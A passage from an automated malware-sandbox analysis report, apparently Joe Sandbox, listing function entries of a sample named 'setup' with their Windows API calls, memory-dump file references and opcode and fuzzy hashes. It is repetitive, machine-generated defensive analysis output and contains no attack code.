                                                                                                                            • Part of subcall function 00C09270: SetEvent.KERNEL32(?,?,00C08DDE,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C0927D
                                                                                                                            • Part of subcall function 00C09270: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00C08DDE,?,?,?,?,00C08A39,?,?,?,00000000,?,00000028,00C063BB), ref: 00C0928B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorEventHandleLastObjectSingleSizeWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3459873347-0
                                                                                                                          • Opcode ID: bbd2587e9e770ccba8c7cea1d4ab653cc46380802449254a71eb525e146b95ee
                                                                                                                          • Instruction ID: 80bebc1fdf34032835b5a1ddf136df4fd75a67d19f167caa89d5700322720d82
                                                                                                                          • Opcode Fuzzy Hash: bbd2587e9e770ccba8c7cea1d4ab653cc46380802449254a71eb525e146b95ee
                                                                                                                          • Instruction Fuzzy Hash: 2621AD74500704AFD7209F65EC89B6B7BE8FB04714F10451EF4A682AE1DB70AD48CB20
                                                                                                                          Function 00C14EBC Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C14EC3
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,?,00000001,?), ref: 00C14F81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExtentH_prolog3_TabbedText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2661843075-0
                                                                                                                          • Opcode ID: d9d243012750605552be34b2c27b1892712919dff43190a3acb37f031eb2d5e3
                                                                                                                          • Instruction ID: 5ab89fac2ca010918f3c7f01ab578d0a4411c67589991872aaadc2e147d444b6
                                                                                                                          • Opcode Fuzzy Hash: d9d243012750605552be34b2c27b1892712919dff43190a3acb37f031eb2d5e3
                                                                                                                          • Instruction Fuzzy Hash: 1331B171900219DFDF04EFA4C886AEDB775FF55314F009029F9166B292DB30AA46EBA0
                                                                                                                          Function 00C7955E Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C87374: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8ABB5,?,00000000,-00000008), ref: 00C873D5
                                                                                                                          • GetLastError.KERNEL32(?,00C797F7,?,?,00C797F7,?,?,00000000,00C6A29E,?,00000000), ref: 00C795C2
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C795C9
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00C797F7,?,?,00C797F7,?,?,00000000,00C6A29E,?,00000000), ref: 00C79603
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C7960A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1913693674-0
                                                                                                                          • Opcode ID: a0436bfe1f61b3a3e967b092ee6389eb3336734207f74db81f035d2e721d08d3
                                                                                                                          • Instruction ID: ca833453f1290d83be477ae51233af5e24c3bc4ee43be0816bcb3d63abf8d706
                                                                                                                          • Opcode Fuzzy Hash: a0436bfe1f61b3a3e967b092ee6389eb3336734207f74db81f035d2e721d08d3
                                                                                                                          • Instruction Fuzzy Hash: 2F212331604219AFCB21AF62C881D6BB7ADFF40364700C629F92D97250E730FD009B90
                                                                                                                          Function 00C12B7E Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreatePopupMenu.USER32 ref: 00C12BA7
                                                                                                                          • _strlen.LIBCMT ref: 00C12BD6
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000096,00000000), ref: 00C12C0D
                                                                                                                          • AppendMenuW.USER32(?,00000010,?,00000000), ref: 00C12C33
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Append$CreatePopup_strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2836490490-0
                                                                                                                          • Opcode ID: 5c6a2b7913c175b2423c2078ff700df37a3c79ef453ca7d9cca4f4404542f86d
                                                                                                                          • Instruction ID: df5d8bfcfb9f2227035e738ae9e73bad6ed351feb9a53d6807adb0b0bead5568
                                                                                                                          • Opcode Fuzzy Hash: 5c6a2b7913c175b2423c2078ff700df37a3c79ef453ca7d9cca4f4404542f86d
                                                                                                                          • Instruction Fuzzy Hash: 8F219575D00215AFDB10DFA4DC45EEEB7B8EF05710F010165EA12E7291DB719E91EBA0
                                                                                                                          Function 00C7949C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0c806bf36acdeee4009df8bbe48fb40643e5ac2d4641e24de9175b61e9512745
                                                                                                                          • Instruction ID: f4c4b8638b37bc8767ff3c933e84317c24fd407f2ec0c38f8068b190ac6ae3de
                                                                                                                          • Opcode Fuzzy Hash: 0c806bf36acdeee4009df8bbe48fb40643e5ac2d4641e24de9175b61e9512745
                                                                                                                          • Instruction Fuzzy Hash: B2219071204219AFDB61AFA58C4196B77AEFF41364B10C629F92ED7251D730EE10A7A0
                                                                                                                          Function 00C0F90F Relevance: 6.1, APIs: 4, Instructions: 76windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C0F916
                                                                                                                          • CreateCompatibleDC.GDI32(00000001), ref: 00C0F96F
                                                                                                                          • CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 00C0F98D
                                                                                                                          • GetBkColor.GDI32(?), ref: 00C0F9C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CompatibleCreate$BitmapColorH_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2424072587-0
                                                                                                                          • Opcode ID: 9cb0c2189bde9d7462bff94a1f8d1688c4fa959af8d5b4a31ff7f38d6d08ee35
                                                                                                                          • Instruction ID: e02999dbc9db423a761868de1b181945f1d86328169631245e257e6306d0e6fe
                                                                                                                          • Opcode Fuzzy Hash: 9cb0c2189bde9d7462bff94a1f8d1688c4fa959af8d5b4a31ff7f38d6d08ee35
                                                                                                                          • Instruction Fuzzy Hash: 263126B0600A11EFCB64DF69C984A1ABBF4FF08300704866EE45ACBA55EB30E914DF94
                                                                                                                          Function 00C88B75 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00C88B7D
                                                                                                                            • Part of subcall function 00C87374: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8ABB5,?,00000000,-00000008), ref: 00C873D5
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C88BB5
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C88BD5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 158306478-0
                                                                                                                          • Opcode ID: ccf40a9b66e89f58dcbf057a2e0d4329b62208701e67a5360773ae9d0f15ac27
                                                                                                                          • Instruction ID: 9928bdfdcc5a7660a8a0c478fdd2829c28d0e0e20e38b689d007319653a41684
                                                                                                                          • Opcode Fuzzy Hash: ccf40a9b66e89f58dcbf057a2e0d4329b62208701e67a5360773ae9d0f15ac27
                                                                                                                          • Instruction Fuzzy Hash: FF1100F15056067F6A1137B2AD8DEBF295CDE863EC3510025F802D2101FE24DE0063B9
                                                                                                                          Function 00C7F8E8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 639e220577c0504a99e1b569ca82776cd9d9796366904e8088f1be205eb672fc
                                                                                                                          • Instruction ID: 8656cf4a7d3da7858b190a46bd1d502be6765de4b6f3f4b5cb590ffda7dd55de
                                                                                                                          • Opcode Fuzzy Hash: 639e220577c0504a99e1b569ca82776cd9d9796366904e8088f1be205eb672fc
                                                                                                                          • Instruction Fuzzy Hash: EB11E731604205BFEB206F659C48F6F3B58FB817A0F218139FA29971A0DB708D01E6A1
                                                                                                                          Function 00C324FC Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32536
                                                                                                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00C32560
                                                                                                                          • GetCapture.USER32 ref: 00C32576
                                                                                                                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 00C32585
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Capture
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1665607226-0
                                                                                                                          • Opcode ID: a46facde81d4e0c0be05be8cfecad2745bd5f81a1a35a3b547f66636b7d8e3e5
                                                                                                                          • Instruction ID: 26178230635d221750d52f834e980731fb1689759d36625028a2ff9e2798e735
                                                                                                                          • Opcode Fuzzy Hash: a46facde81d4e0c0be05be8cfecad2745bd5f81a1a35a3b547f66636b7d8e3e5
                                                                                                                          • Instruction Fuzzy Hash: 39119871350219BFEE211B60DC9DFBE7B6EFB48794F050025F605561E6CBA19D10AA60
                                                                                                                          Function 00C3FD75 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • BeginDeferWindowPos.USER32(00000000), ref: 00C3FD93
                                                                                                                          • IsWindow.USER32(?), ref: 00C3FDAE
                                                                                                                          • DeferWindowPos.USER32(00000000,?,00000000,?,?,?,?,00000000), ref: 00C3FDF7
                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 00C3FE02
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Defer$Begin
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2880567340-0
                                                                                                                          • Opcode ID: d7f2aaefa55bab12d741f701fa5200302c17c71369d712b022b3d1b97775c826
                                                                                                                          • Instruction ID: 453545b6ea76c199479f0ab57d4daa805e9a6da539b9f95524306dabb08111c3
                                                                                                                          • Opcode Fuzzy Hash: d7f2aaefa55bab12d741f701fa5200302c17c71369d712b022b3d1b97775c826
                                                                                                                          • Instruction Fuzzy Hash: 7B113A71E0020AAFDB11DFA9DD48BAEBBB9FF08700F144529A501E3261D730AA51DBA0
                                                                                                                          Function 00C3B0DB Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 00C3B116
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3B11F
                                                                                                                          • swprintf.LIBCMT ref: 00C3B13C
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00C3B14D
                                                                                                                            • Part of subcall function 00C3AF66: RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C3AD94,?,00000000), ref: 00C3AFAB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$PrivateProfileStringValueWriteswprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 581541481-0
                                                                                                                          • Opcode ID: ebfdbb094721df4937e897446e23604637de8b068f7d10c01c3fd1aa987677a4
                                                                                                                          • Instruction ID: e18f7b600164c2eae8d771ea087f58a6e6ad689c6903163efaa6d113399dc76a
                                                                                                                          • Opcode Fuzzy Hash: ebfdbb094721df4937e897446e23604637de8b068f7d10c01c3fd1aa987677a4
                                                                                                                          • Instruction Fuzzy Hash: E4016172500209ABDB149F68DD8AFAE77BDEF48B14F10451AF601E7190DB74EE049760
                                                                                                                          Function 00C195FB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C1965A
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 00C1965E
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 00C19662
                                                                                                                          • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00C19685
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2793162063-0
                                                                                                                          • Opcode ID: 3498bb21b144612307cd22a9d979c96b7bae92649f8646ed6b19e7bf83ef2a40
                                                                                                                          • Instruction ID: f93042d4f41150facfcc22dccb7d486285da589df9f69fcde9bcdbadf2e1129c
                                                                                                                          • Opcode Fuzzy Hash: 3498bb21b144612307cd22a9d979c96b7bae92649f8646ed6b19e7bf83ef2a40
                                                                                                                          • Instruction Fuzzy Hash: 22111270E402187AEB319F659C4AFEFBBBCEF84B10F00419AA508A6181D7B45B45CE95
                                                                                                                          Function 00C71637 Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,?,00C7145B,00000000,00000004,00000000), ref: 00C71686
                                                                                                                          • GetLastError.KERNEL32 ref: 00C71692
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C71699
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744730728-0
                                                                                                                          • Opcode ID: 2021a68faf0dc76399f515542d8191bd5aab7f13d83c6a37e7fd4ace1d9e3b99
                                                                                                                          • Instruction ID: 2429bab4b35af653ea9650eb140bf452914096286d7a9a560114145df9c619e1
                                                                                                                          • Opcode Fuzzy Hash: 2021a68faf0dc76399f515542d8191bd5aab7f13d83c6a37e7fd4ace1d9e3b99
                                                                                                                          • Instruction Fuzzy Hash: 42019672500204BBCB109FA9DC09BAE7F79EF81776F28C259F929961E0DB708A41D750
                                                                                                                          Function 00C3778A Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnableMenuItem.USER32(?,?,00000403), ref: 00C377BA
                                                                                                                          • GetFocus.USER32 ref: 00C377D4
                                                                                                                          • GetParent.USER32(?), ref: 00C377DF
                                                                                                                          • SendMessageW.USER32(?,00000028,00000000,00000000), ref: 00C377F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2297321873-0
                                                                                                                          • Opcode ID: da39f89d5baf6a3d859085b8fb5282a3fb0691f30444992fbc5ca23ddc44cd29
                                                                                                                          • Instruction ID: 495c93f242ef7c7a0438e099a970177f74466dea711a1f4a481b1d191ae6ee48
                                                                                                                          • Opcode Fuzzy Hash: da39f89d5baf6a3d859085b8fb5282a3fb0691f30444992fbc5ca23ddc44cd29
